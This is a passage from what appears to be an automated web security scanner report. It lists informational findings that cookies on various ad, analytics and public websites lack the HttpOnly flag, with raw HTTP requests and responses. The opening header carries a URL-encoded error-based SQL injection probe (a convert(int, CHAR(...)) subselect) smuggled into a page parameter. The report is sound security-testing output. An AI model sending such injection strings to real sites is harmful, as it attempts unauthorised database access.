Location: http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.21/s27710598513465?AQB=1&pccr=true&vidn=269F1B3305160AA7-600001A2A004A9AA&&ndh=1&t=24/0/2011%2020%3A33%3A10%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Buying%20a%20Boat%3F%20Search%20on%20Soundingsonline.com&g=http%3A//www.soundingsonline.com/index.php%3Foption%3Dcom_content%26view%3Dcategory%26layout%3Dblog%26id%3D%27%252B%2520%28select%2Bconvert%28int%2CCHAR%2895%29%252BCHAR%2833%29%252BCHAR%2864%29%252BCHAR%2850%29%252BCHAR%28100%29%252BCHAR%28105%29%252BCHAR%28108%29%252BCHAR%28101%29%252BCHAR%28109%29%252BCHAR%28109%29%252BCHAR%2897%29%29%2BFROM%2Bsyscolum&cc=USD&ch=www.soundingsonline.com&events=event1%2Cevent2&c1=D%3Dg&v1=D%3Dg&c2=1&v2=1&c3=monday%7C9%3A30pm&v3=monday%7C9%3A30pm&c4=New&v4=New&c5=First%20Visit&v5=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1192&bh=688&ct=lan&hp=N&AQE=1
X-C: ms-4.3.1
Expires: Mon, 24 Jan 2011 02:33:10 GMT
Last-Modified: Wed, 26 Jan 2011 02:33:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www621
Content-Length: 0
Content-Type: text/plain

14.259. http://dp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dp.specificclick.net
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.260. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.abbreviations.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.261. http://extensions.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.262. http://extensions.joomla.org/extensions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.263. http://extensions.joomla.org/extensions/advanced-search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/advanced-search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.264. http://extensions.joomla.org/extensions/languages/translations-for-joomla previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/languages/translations-for-joomla

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.265. http://extensions.joomla.org/extensions/new previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://extensions.joomla.org
Path:	/extensions/new

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.266. http://flybase.org/reports/FBgn0000146.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flybase.org
Path:	/reports/FBgn0000146.html/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BALANCEID=balancer.chervil; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reports/FBgn0000146.html/x22 HTTP/1.1
Host: flybase.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:51 GMT
Server: Apache/1.3.26
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 24 Jan 2011 15:11:51 GMT
Content-Type: text/html;charset=UTF-8
set-cookie: BALANCEID=balancer.chervil; path=/;
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 493133

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv
...[SNIP]...

14.267. http://forums.freebsd.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.freebsd.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bblastvisit=1295881916; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: forums.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.268. http://foxaudiencenetwork.122.2o7.net/b/ss/fan-foxaudience/1/H.20.3/s68358821158763 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://foxaudiencenetwork.122.2o7.net
Path:	/b/ss/fan-foxaudience/1/H.20.3/s68358821158763

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|269F65E9851D1546-40000138C04118F2[CE]; Expires=Sun, 24 Jan 2016 13:10:43 GMT; Domain=foxaudiencenetwork.122.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/fan-foxaudience/1/H.20.3/s68358821158763?AQB=1&ndh=1&t=25/0/2011%207%3A10%3A44%202%20360&ce=ISO-8859-1&ns=foxaudiencenetwork&pageName=FAN%3AHomePage&g=http%3A//www.foxaudiencenetwork.com/&cc=USD&ch=HomePage&server=www.foxaudiencenetwork.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: foxaudiencenetwork.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.foxaudiencenetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:10:43 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269F65E9851D1546-40000138C04118F2[CE]; Expires=Sun, 24 Jan 2016 13:10:43 GMT; Domain=foxaudiencenetwork.122.2o7.net; Path=/
Location: http://foxaudiencenetwork.122.2o7.net/b/ss/fan-foxaudience/1/H.20.3/s68358821158763?AQB=1&pccr=true&vidn=269F65E9851D1546-40000138C04118F2&&ndh=1&t=25/0/2011%207%3A10%3A44%202%20360&ce=ISO-8859-1&ns=foxaudiencenetwork&pageName=FAN%3AHomePage&g=http%3A//www.foxaudiencenetwork.com/&cc=USD&ch=HomePage&server=www.foxaudiencenetwork.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Mon, 24 Jan 2011 13:10:43 GMT
Last-Modified: Wed, 26 Jan 2011 13:10:43 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www398
Content-Length: 0
Content-Type: text/plain

14.269. http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gegnia.com
Path:	/joomla/informacion/mbrriti-joomla-1-pik-6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

22bae4d6bb8978acd20b7a9dac0f3f85=ovtfp6obggr08kcq0mtis1qq55; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla/informacion/mbrriti-joomla-1-pik-6 HTTP/1.1
Host: gegnia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.270. https://github.com/DataSift/TweetMeme-Chrome-Extension previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://github.com
Path:	/DataSift/TweetMeme-Chrome-Extension

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DataSift/TweetMeme-Chrome-Extension HTTP/1.1
Host: github.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.271. http://goto.ext.google.com/og-dogfood-issue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goto.ext.google.com
Path:	/og-dogfood-issue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=apphosting=xoAZxMqRaa6zR0f9f5WNwA; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-dogfood-issue HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-dogfood-issue
Set-Cookie: S=apphosting=xoAZxMqRaa6zR0f9f5WNwA; path=/
Date: Mon, 24 Jan 2011 22:35:55 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close

14.272. http://goto.ext.google.com/og-exp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goto.ext.google.com
Path:	/og-exp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=apphosting=m36BQtRaQ0k7rP0DZWfNAg; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-exp HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-exp
Set-Cookie: S=apphosting=m36BQtRaQ0k7rP0DZWfNAg; path=/
Date: Mon, 24 Jan 2011 22:35:56 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close

14.273. http://green.autobytel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://green.autobytel.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cweb=JONQJVS10.4.128.192CKMMI; path=/
USER_UUID_VCH=45B1050B%2DCA19%2DA839%2DE9A7BDE5F665AC56;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
TIME=%7Bts%20%272011%2D01%2D24%2014%3A35%3A00%27%7D;path=/
TIME=%7Bts%20%272011%2D01%2D24%2018%3A36%3A00%27%7D;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
ID=27696%3Bhybd;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: green.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.274. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.275. http://groups.google.com/group/joomla-commits/topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/group/joomla-commits/topics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.276. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.277. http://groups.google.com/grphp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/grphp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.278. http://gsas.harvard.edu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gsas.harvard.edu
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cb77073be2d435002988db5e6e1c1bab=hlaugf5hcca71ner7h6670p4h1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: gsas.harvard.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: cb77073be2d435002988db5e6e1c1bab=hlaugf5hcca71ner7h6670p4h1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:36:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9792

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

14.279. http://hairmakeup.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hairmakeup.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.280. http://homepage.mac.com/yukikun/software/slimbox_ex/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://homepage.mac.com
Path:	/yukikun/software/slimbox_ex/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mmr=nk11r10; Domain=homepage.mac.com; Path=/yukikun

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yukikun/software/slimbox_ex/ HTTP/1.1
Host: homepage.mac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AppleIDiskServer.1G3010
x-responding-server: hpng005-0
Location: http://www.me.com/account_error.html
Content-Length: 0
Date: Tue, 25 Jan 2011 15:02:51 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/yukikun

14.281. http://howto.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://howto.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: howto.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.282. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
rdrlst=20z0so2ylebnns0000000h0o03050310g7dpletz4d0000000d0o03050310d10flfk1rn000000020o020502102mmnlebnns0000000h0o03050310g10elfk1rn000000020o020502102x1blebnns0000000h0o03050310gxo1lebnns0000000h0o03050310geh5lf17qf000000090o0305031096bylemlne0000000f0o03050310fw3clebnns0000000h0o03050310g7gmlebnns0000000h0o03050310gjv6lebnns0000000h0o03050310gj4ilew2e20000000b0o03050310bxthlebnns0000000h0o03050310gfullf8gij000000050o0305031050c9lfk1rn000000020o020502102jillebnns0000000h0o03050310gfuqlegh2b0000000g0o03050310gb6mlf17qk000000080o030503108mz1lebnns0000000h0o03050310gcajlfk1rn000000020o020502102p7vlebnns0000000h0o03050310g7vglfk1rn000000020o020502102xvslebnns0000000h0o03050310g10rlfjpei000000030o030503103xuklebnns0000000h0o03050310gjk7lebnns0000000h0o03050310gx1jlebnns0000000h0o03050310gyiplebnns0000000h0o03050310gcbnlfk1rn000000020o020502102xwflebnns0000000h0o03050310gyh0lebnns0000000h0o03050310ge4vlebnns0000000h0o03050310gxwblebnns0000000h0o03050310gjwblfk1rn000000020o020502102; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000070o03050310782gletz4d0pqa500a0l000400100ag2leqh190tm3600e0o03050310e82hlebnns181qq00h0o03050310g9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000030o030503103820lebnns181qq00e0l000400100b0olfjpei000000030o030503103ab4lebnns181qq00h0o03050310g9szlebnns181qq00h0o03050310g8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13m2400g0o03050310gal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000030o0305031038bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000030o03050310340slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000040o03050310440uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: rdrlst=20z0so2ylebnns0000000h0o03050310g7dpletz4d0000000d0o03050310d10flfk1rn000000020o020502102mmnlebnns0000000h0o03050310g10elfk1rn000000020o020502102x1blebnns0000000h0o03050310gxo1lebnns0000000h0o03050310geh5lf17qf000000090o0305031096bylemlne0000000f0o03050310fw3clebnns0000000h0o03050310g7gmlebnns0000000h0o03050310gjv6lebnns0000000h0o03050310gj4ilew2e20000000b0o03050310bxthlebnns0000000h0o03050310gfullf8gij000000050o0305031050c9lfk1rn000000020o020502102jillebnns0000000h0o03050310gfuqlegh2b0000000g0o03050310gb6mlf17qk000000080o030503108mz1lebnns0000000h0o03050310gcajlfk1rn000000020o020502102p7vlebnns0000000h0o03050310g7vglfk1rn000000020o020502102xvslebnns0000000h0o03050310g10rlfjpei000000030o030503103xuklebnns0000000h0o03050310gjk7lebnns0000000h0o03050310gx1jlebnns0000000h0o03050310gyiplebnns0000000h0o03050310gcbnlfk1rn000000020o020502102xwflebnns0000000h0o03050310gyh0lebnns0000000h0o03050310ge4vlebnns0000000h0o03050310gxwblebnns0000000h0o03050310gjwblfk1rn000000020o020502102; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000070o03050310782gletz4d0pqa500a0l000400100ag2leqh190tm3600e0o03050310e82hlebnns181qq00h0o03050310g9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000030o030503103820lebnns181qq00e0l000400100b0olfjpei000000030o030503103ab4lebnns181qq00h0o03050310g9szlebnns181qq00h0o03050310g8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13m2400g0o03050310gal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000030o0305031038bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000030o03050310340slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000040o03050310440uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
Location: http://r.openx.net/set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=6ch47d7o8wtv
Content-Length: 0
Date: Tue, 25 Jan 2011 02:05:02 GMT

14.283. http://il.youtube.com/watch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://il.youtube.com
